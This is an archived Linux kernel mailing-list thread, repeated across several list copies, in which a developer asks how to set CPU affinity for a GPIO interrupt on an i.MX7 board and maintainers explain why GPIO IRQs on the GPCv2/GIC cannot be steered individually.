> > 
> > 
> > > Regards,
> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-14 13:11               ` Lucas Stach
  (?)
@ 2018-05-14 14:28                 ` Pintu Kumar
  -1 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 14:28 UTC (permalink / raw)
  To: Lucas Stach
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> Hi,
>>
>> Is there any work around possible to set IRQ affinity for some GPIO
>> interrupt ?
>> How to avoid CPU0 to receive the current GPIO interrupt ?
>> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> that GPIO interrupt can be served by another CPU ?
>>
>> Need your inputs to decide whether it is still possible to set
>> affinity for GPIO interrupt, or its impossible ?
>
> This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> line per GPIO bank, so it is not possible to change affinity of a
> single GPIO interrupt to another CPU.

OK. Thanks for your confirmation.

> Best we could do is change the
> affinity of the whole bank,

OK. How can we do this on the fly from my driver code.
If you have any reference please let me know.
This is required only for experimental purpose to prove the point to be mgmt.
My idea is, from the driver, change the affinity of the whole bank.
So, the GPIO interrupt can be delivered on to this specific CPU bank.
Once I am done, I will revert back to the old bank.
Please give me some hint on how to do this from my kernel module....


> but given the limited usefulness of
> something like that, nobody bothered to implement such a thing.
>
> Regards,
> Lucas
>
>>
>>
>> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> wrote:
>> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> > e> wrote:
>> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> > > ARM Linux:
>> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > > > > Hi,
>> > > > >
>> > > > > I need one help.
>> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> > > > >
>> > > > > Let's say I am interested in GPIO number: 21
>> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> > > > > so I
>> > > > > tried the below steps:
>> > > > > root@10:~# echo 21 > /sys/class/gpio/export
>> > > > > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > > > > root@10:~# cat /proc/interrupts | grep 21
>> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > > > > root@10:~# cat /sys/class/gpio/gpio21/direction
>> > > > > in
>> > > > > root@10:~# cat /proc/irq/47/smp_affinity
>> > > > > 3
>> > > > > root@10:~# echo 2 > /proc/irq/47/smp_affinity
>> > > > > -bash: echo: write error: Input/output error
>> > > > >
>> > > > > But I get input/output error.
>> > > > > When I debug further, found that irq_can_set_affinity is
>> > > > > returning 0:
>> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > > > > [    0.000000] write_irq_affinity: FAIL
>> > > > >
>> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> > > > > 2 (from 3).
>> > > > > This change is working, but the smp_affinity setting for the
>> > > > > new IRQ
>> > > > > is not working.
>> > > > >
>> > > > > When I try to set smp_affinity for mmc0, then it works.
>> > > > > # cat /proc/interrupts | grep mmc
>> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> > > > >
>> > > > > root@10:~# echo 2 > /proc/irq/295/smp_affinity
>> > > > > root@10:~#
>> > > > >
>> > > > >
>> > > > > So, I wanted to know what are the conditions for which
>> > > > > setting
>> > > > > smp_affinity for an IRQ will work ?
>> > > > >
>> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> > > > > IRQ ?
>> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> > > >
>> > > > IRQ affinity is only supported where interrupts are _directly_
>> > > > wired to
>> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> > > > CPU
>> > > > cores.
>> > > >
>> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> > > > have no
>> > > > ability to be directed independently to other CPUs - the only
>> > > > possible
>> > > > way to change the mapping is to move _all_ interrupts on that
>> > > > controller,
>> > > > and any downstream chained interrupts at GIC level.
>> > > >
>> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> > > > is no way
>> > > > for the interrupt controller itself to change the affinity of
>> > > > the input
>> > > > interrupt.
>> > >
>> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> > > mapping
>> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> > > thus be
>> > > handled by forwarding the request to the GIC by
>> > > irq_chip_set_affinity_parent().
>> > >
>> > > As this is handled correctly in the upstream kernel since the
>> > > first
>> > > commit introducing support for the GPCv2, it seems the issue is
>> > > only
>> > > present in some downstream kernel.
>> > >
>> >
>> > OK. Thanks so much for your reply.
>> >
>> > I saw some of the drivers using irq_set_affinity_hint() to force
>> > the
>> > IRQ affinity to a particular CPU.
>> > This is the sample:
>> > {
>> > cpumask_clear(mask);
>> > cpumask_set_cpu(cpu, mask);
>> > irq_set_affinity_hint(irq, mask);
>> > }
>> >
>> > Whether this logic will work for a particular GPIO pin ?
>> >
>> >
>> > > Regards,
>> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 14:28                 ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 14:28 UTC (permalink / raw)
  To: linux-arm-kernel

On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> Hi,
>>
>> Is there any work around possible to set IRQ affinity for some GPIO
>> interrupt ?
>> How to avoid CPU0 to receive the current GPIO interrupt ?
>> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> that GPIO interrupt can be served by another CPU ?
>>
>> Need your inputs to decide whether it is still possible to set
>> affinity for GPIO interrupt, or its impossible ?
>
> This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> line per GPIO bank, so it is not possible to change affinity of a
> single GPIO interrupt to another CPU.

OK. Thanks for your confirmation.

> Best we could do is change the
> affinity of the whole bank,

OK. How can we do this on the fly from my driver code.
If you have any reference please let me know.
This is required only for experimental purpose to prove the point to be mgmt.
My idea is, from the driver, change the affinity of the whole bank.
So, the GPIO interrupt can be delivered on to this specific CPU bank.
Once I am done, I will revert back to the old bank.
Please give me some hint on how to do this from my kernel module....


> but given the limited usefulness of
> something like that, nobody bothered to implement such a thing.
>
> Regards,
> Lucas
>
>>
>>
>> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> wrote:
>> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> > e> wrote:
>> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> > > ARM Linux:
>> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > > > > Hi,
>> > > > >
>> > > > > I need one help.
>> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> > > > >
>> > > > > Let's say I am interested in GPIO number: 21
>> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> > > > > so I
>> > > > > tried the below steps:
>> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
>> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > > > > root at 10:~# cat /proc/interrupts | grep 21
>> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> > > > > in
>> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
>> > > > > 3
>> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> > > > > -bash: echo: write error: Input/output error
>> > > > >
>> > > > > But I get input/output error.
>> > > > > When I debug further, found that irq_can_set_affinity is
>> > > > > returning 0:
>> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > > > > [    0.000000] write_irq_affinity: FAIL
>> > > > >
>> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> > > > > 2 (from 3).
>> > > > > This change is working, but the smp_affinity setting for the
>> > > > > new IRQ
>> > > > > is not working.
>> > > > >
>> > > > > When I try to set smp_affinity for mmc0, then it works.
>> > > > > # cat /proc/interrupts | grep mmc
>> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> > > > >
>> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> > > > > root at 10:~#
>> > > > >
>> > > > >
>> > > > > So, I wanted to know what are the conditions for which
>> > > > > setting
>> > > > > smp_affinity for an IRQ will work ?
>> > > > >
>> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> > > > > IRQ ?
>> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> > > >
>> > > > IRQ affinity is only supported where interrupts are _directly_
>> > > > wired to
>> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> > > > CPU
>> > > > cores.
>> > > >
>> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> > > > have no
>> > > > ability to be directed independently to other CPUs - the only
>> > > > possible
>> > > > way to change the mapping is to move _all_ interrupts on that
>> > > > controller,
>> > > > and any downstream chained interrupts at GIC level.
>> > > >
>> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> > > > is no way
>> > > > for the interrupt controller itself to change the affinity of
>> > > > the input
>> > > > interrupt.
>> > >
>> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> > > mapping
>> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> > > thus be
>> > > handled by forwarding the request to the GIC by
>> > > irq_chip_set_affinity_parent().
>> > >
>> > > As this is handled correctly in the upstream kernel since the
>> > > first
>> > > commit introducing support for the GPCv2, it seems the issue is
>> > > only
>> > > present in some downstream kernel.
>> > >
>> >
>> > OK. Thanks so much for your reply.
>> >
>> > I saw some of the drivers using irq_set_affinity_hint() to force
>> > the
>> > IRQ affinity to a particular CPU.
>> > This is the sample:
>> > {
>> > cpumask_clear(mask);
>> > cpumask_set_cpu(cpu, mask);
>> > irq_set_affinity_hint(irq, mask);
>> > }
>> >
>> > Whether this logic will work for a particular GPIO pin ?
>> >
>> >
>> > > Regards,
>> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 14:28                 ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 14:28 UTC (permalink / raw)
  To: kernelnewbies

On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> Hi,
>>
>> Is there any work around possible to set IRQ affinity for some GPIO
>> interrupt ?
>> How to avoid CPU0 to receive the current GPIO interrupt ?
>> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> that GPIO interrupt can be served by another CPU ?
>>
>> Need your inputs to decide whether it is still possible to set
>> affinity for GPIO interrupt, or its impossible ?
>
> This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> line per GPIO bank, so it is not possible to change affinity of a
> single GPIO interrupt to another CPU.

OK. Thanks for your confirmation.

> Best we could do is change the
> affinity of the whole bank,

OK. How can we do this on the fly from my driver code.
If you have any reference please let me know.
This is required only for experimental purpose to prove the point to be mgmt.
My idea is, from the driver, change the affinity of the whole bank.
So, the GPIO interrupt can be delivered on to this specific CPU bank.
Once I am done, I will revert back to the old bank.
Please give me some hint on how to do this from my kernel module....


> but given the limited usefulness of
> something like that, nobody bothered to implement such a thing.
>
> Regards,
> Lucas
>
>>
>>
>> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> wrote:
>> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> > e> wrote:
>> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> > > ARM Linux:
>> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > > > > Hi,
>> > > > >
>> > > > > I need one help.
>> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> > > > >
>> > > > > Let's say I am interested in GPIO number: 21
>> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> > > > > so I
>> > > > > tried the below steps:
>> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
>> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > > > > root at 10:~# cat /proc/interrupts | grep 21
>> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> > > > > in
>> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
>> > > > > 3
>> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> > > > > -bash: echo: write error: Input/output error
>> > > > >
>> > > > > But I get input/output error.
>> > > > > When I debug further, found that irq_can_set_affinity is
>> > > > > returning 0:
>> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > > > > [    0.000000] write_irq_affinity: FAIL
>> > > > >
>> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> > > > > 2 (from 3).
>> > > > > This change is working, but the smp_affinity setting for the
>> > > > > new IRQ
>> > > > > is not working.
>> > > > >
>> > > > > When I try to set smp_affinity for mmc0, then it works.
>> > > > > # cat /proc/interrupts | grep mmc
>> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> > > > >
>> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> > > > > root at 10:~#
>> > > > >
>> > > > >
>> > > > > So, I wanted to know what are the conditions for which
>> > > > > setting
>> > > > > smp_affinity for an IRQ will work ?
>> > > > >
>> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> > > > > IRQ ?
>> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> > > >
>> > > > IRQ affinity is only supported where interrupts are _directly_
>> > > > wired to
>> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> > > > CPU
>> > > > cores.
>> > > >
>> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> > > > have no
>> > > > ability to be directed independently to other CPUs - the only
>> > > > possible
>> > > > way to change the mapping is to move _all_ interrupts on that
>> > > > controller,
>> > > > and any downstream chained interrupts at GIC level.
>> > > >
>> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> > > > is no way
>> > > > for the interrupt controller itself to change the affinity of
>> > > > the input
>> > > > interrupt.
>> > >
>> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> > > mapping
>> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> > > thus be
>> > > handled by forwarding the request to the GIC by
>> > > irq_chip_set_affinity_parent().
>> > >
>> > > As this is handled correctly in the upstream kernel since the
>> > > first
>> > > commit introducing support for the GPCv2, it seems the issue is
>> > > only
>> > > present in some downstream kernel.
>> > >
>> >
>> > OK. Thanks so much for your reply.
>> >
>> > I saw some of the drivers using irq_set_affinity_hint() to force
>> > the
>> > IRQ affinity to a particular CPU.
>> > This is the sample:
>> > {
>> > cpumask_clear(mask);
>> > cpumask_set_cpu(cpu, mask);
>> > irq_set_affinity_hint(irq, mask);
>> > }
>> >
>> > Whether this logic will work for a particular GPIO pin ?
>> >
>> >
>> > > Regards,
>> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-14 14:28                 ` Pintu Kumar
  (?)
@ 2018-05-17 13:28                   ` Pintu Kumar
  -1 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-17 13:28 UTC (permalink / raw)
  To: Lucas Stach
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>
> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> >> Hi,
> >>
> >> Is there any work around possible to set IRQ affinity for some GPIO
> >> interrupt ?
> >> How to avoid CPU0 to receive the current GPIO interrupt ?
> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
> >> that GPIO interrupt can be served by another CPU ?
> >>
> >> Need your inputs to decide whether it is still possible to set
> >> affinity for GPIO interrupt, or its impossible ?
> >
> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> > line per GPIO bank, so it is not possible to change affinity of a
> > single GPIO interrupt to another CPU.
>
> OK. Thanks for your confirmation.
>
> > Best we could do is change the
> > affinity of the whole bank,
>

Hi,

I found that the driver is responsible for setting GPIO bank in i.MX7:
https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c

However I still dont know how to set the cpumask for one of the GPIO Bank.

>From this link, it seems it is possible to set affinity for a GPIO IRQ.
https://community.nxp.com/thread/303144

But when I try it form my GPIO138 (GPIO5_IO10) it did not help.

So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
Please give me some pointers.

Thanks


> OK. How can we do this on the fly from my driver code.
> If you have any reference please let me know.
> This is required only for experimental purpose to prove the point to be mgmt.
> My idea is, from the driver, change the affinity of the whole bank.
> So, the GPIO interrupt can be delivered on to this specific CPU bank.
> Once I am done, I will revert back to the old bank.
> Please give me some hint on how to do this from my kernel module....
>
>
> > but given the limited usefulness of
> > something like that, nobody bothered to implement such a thing.
> >
> > Regards,
> > Lucas
> >
> >>
> >>
> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> >> wrote:
> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> >> > e> wrote:
> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> >> > > ARM Linux:
> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> >> > > > > Hi,
> >> > > > >
> >> > > > > I need one help.
> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> >> > > > >
> >> > > > > Let's say I am interested in GPIO number: 21
> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> >> > > > > so I
> >> > > > > tried the below steps:
> >> > > > > root@10:~# echo 21 > /sys/class/gpio/export
> >> > > > > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> >> > > > > root@10:~# cat /proc/interrupts | grep 21
> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
> >> > > > > root@10:~# cat /sys/class/gpio/gpio21/direction
> >> > > > > in
> >> > > > > root@10:~# cat /proc/irq/47/smp_affinity
> >> > > > > 3
> >> > > > > root@10:~# echo 2 > /proc/irq/47/smp_affinity
> >> > > > > -bash: echo: write error: Input/output error
> >> > > > >
> >> > > > > But I get input/output error.
> >> > > > > When I debug further, found that irq_can_set_affinity is
> >> > > > > returning 0:
> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> >> > > > > [    0.000000] write_irq_affinity: FAIL
> >> > > > >
> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> >> > > > > 2 (from 3).
> >> > > > > This change is working, but the smp_affinity setting for the
> >> > > > > new IRQ
> >> > > > > is not working.
> >> > > > >
> >> > > > > When I try to set smp_affinity for mmc0, then it works.
> >> > > > > # cat /proc/interrupts | grep mmc
> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
> >> > > > >
> >> > > > > root@10:~# echo 2 > /proc/irq/295/smp_affinity
> >> > > > > root@10:~#
> >> > > > >
> >> > > > >
> >> > > > > So, I wanted to know what are the conditions for which
> >> > > > > setting
> >> > > > > smp_affinity for an IRQ will work ?
> >> > > > >
> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> >> > > > > IRQ ?
> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> >> > > >
> >> > > > IRQ affinity is only supported where interrupts are _directly_
> >> > > > wired to
> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
> >> > > > CPU
> >> > > > cores.
> >> > > >
> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> >> > > > have no
> >> > > > ability to be directed independently to other CPUs - the only
> >> > > > possible
> >> > > > way to change the mapping is to move _all_ interrupts on that
> >> > > > controller,
> >> > > > and any downstream chained interrupts at GIC level.
> >> > > >
> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> >> > > > is no way
> >> > > > for the interrupt controller itself to change the affinity of
> >> > > > the input
> >> > > > interrupt.
> >> > >
> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> >> > > mapping
> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> >> > > thus be
> >> > > handled by forwarding the request to the GIC by
> >> > > irq_chip_set_affinity_parent().
> >> > >
> >> > > As this is handled correctly in the upstream kernel since the
> >> > > first
> >> > > commit introducing support for the GPCv2, it seems the issue is
> >> > > only
> >> > > present in some downstream kernel.
> >> > >
> >> >
> >> > OK. Thanks so much for your reply.
> >> >
> >> > I saw some of the drivers using irq_set_affinity_hint() to force
> >> > the
> >> > IRQ affinity to a particular CPU.
> >> > This is the sample:
> >> > {
> >> > cpumask_clear(mask);
> >> > cpumask_set_cpu(cpu, mask);
> >> > irq_set_affinity_hint(irq, mask);
> >> > }
> >> >
> >> > Whether this logic will work for a particular GPIO pin ?
> >> >


>
> >> >
> >> > > Regards,
> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-17 13:28                   ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-17 13:28 UTC (permalink / raw)
  To: linux-arm-kernel

On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>
> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> >> Hi,
> >>
> >> Is there any work around possible to set IRQ affinity for some GPIO
> >> interrupt ?
> >> How to avoid CPU0 to receive the current GPIO interrupt ?
> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
> >> that GPIO interrupt can be served by another CPU ?
> >>
> >> Need your inputs to decide whether it is still possible to set
> >> affinity for GPIO interrupt, or its impossible ?
> >
> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> > line per GPIO bank, so it is not possible to change affinity of a
> > single GPIO interrupt to another CPU.
>
> OK. Thanks for your confirmation.
>
> > Best we could do is change the
> > affinity of the whole bank,
>

Hi,

I found that the driver is responsible for setting GPIO bank in i.MX7:
https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c

However I still dont know how to set the cpumask for one of the GPIO Bank.

>From this link, it seems it is possible to set affinity for a GPIO IRQ.
https://community.nxp.com/thread/303144

But when I try it form my GPIO138 (GPIO5_IO10) it did not help.

So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
Please give me some pointers.

Thanks


> OK. How can we do this on the fly from my driver code.
> If you have any reference please let me know.
> This is required only for experimental purpose to prove the point to be mgmt.
> My idea is, from the driver, change the affinity of the whole bank.
> So, the GPIO interrupt can be delivered on to this specific CPU bank.
> Once I am done, I will revert back to the old bank.
> Please give me some hint on how to do this from my kernel module....
>
>
> > but given the limited usefulness of
> > something like that, nobody bothered to implement such a thing.
> >
> > Regards,
> > Lucas
> >
> >>
> >>
> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> >> wrote:
> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> >> > e> wrote:
> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> >> > > ARM Linux:
> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> >> > > > > Hi,
> >> > > > >
> >> > > > > I need one help.
> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> >> > > > >
> >> > > > > Let's say I am interested in GPIO number: 21
> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> >> > > > > so I
> >> > > > > tried the below steps:
> >> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
> >> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> >> > > > > root at 10:~# cat /proc/interrupts | grep 21
> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
> >> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
> >> > > > > in
> >> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
> >> > > > > 3
> >> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> >> > > > > -bash: echo: write error: Input/output error
> >> > > > >
> >> > > > > But I get input/output error.
> >> > > > > When I debug further, found that irq_can_set_affinity is
> >> > > > > returning 0:
> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> >> > > > > [    0.000000] write_irq_affinity: FAIL
> >> > > > >
> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> >> > > > > 2 (from 3).
> >> > > > > This change is working, but the smp_affinity setting for the
> >> > > > > new IRQ
> >> > > > > is not working.
> >> > > > >
> >> > > > > When I try to set smp_affinity for mmc0, then it works.
> >> > > > > # cat /proc/interrupts | grep mmc
> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
> >> > > > >
> >> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> >> > > > > root at 10:~#
> >> > > > >
> >> > > > >
> >> > > > > So, I wanted to know what are the conditions for which
> >> > > > > setting
> >> > > > > smp_affinity for an IRQ will work ?
> >> > > > >
> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> >> > > > > IRQ ?
> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> >> > > >
> >> > > > IRQ affinity is only supported where interrupts are _directly_
> >> > > > wired to
> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
> >> > > > CPU
> >> > > > cores.
> >> > > >
> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> >> > > > have no
> >> > > > ability to be directed independently to other CPUs - the only
> >> > > > possible
> >> > > > way to change the mapping is to move _all_ interrupts on that
> >> > > > controller,
> >> > > > and any downstream chained interrupts at GIC level.
> >> > > >
> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> >> > > > is no way
> >> > > > for the interrupt controller itself to change the affinity of
> >> > > > the input
> >> > > > interrupt.
> >> > >
> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> >> > > mapping
> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> >> > > thus be
> >> > > handled by forwarding the request to the GIC by
> >> > > irq_chip_set_affinity_parent().
> >> > >
> >> > > As this is handled correctly in the upstream kernel since the
> >> > > first
> >> > > commit introducing support for the GPCv2, it seems the issue is
> >> > > only
> >> > > present in some downstream kernel.
> >> > >
> >> >
> >> > OK. Thanks so much for your reply.
> >> >
> >> > I saw some of the drivers using irq_set_affinity_hint() to force
> >> > the
> >> > IRQ affinity to a particular CPU.
> >> > This is the sample:
> >> > {
> >> > cpumask_clear(mask);
> >> > cpumask_set_cpu(cpu, mask);
> >> > irq_set_affinity_hint(irq, mask);
> >> > }
> >> >
> >> > Whether this logic will work for a particular GPIO pin ?
> >> >


>
> >> >
> >> > > Regards,
> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-17 13:28                   ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-17 13:28 UTC (permalink / raw)
  To: kernelnewbies

On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>
> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> >> Hi,
> >>
> >> Is there any work around possible to set IRQ affinity for some GPIO
> >> interrupt ?
> >> How to avoid CPU0 to receive the current GPIO interrupt ?
> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
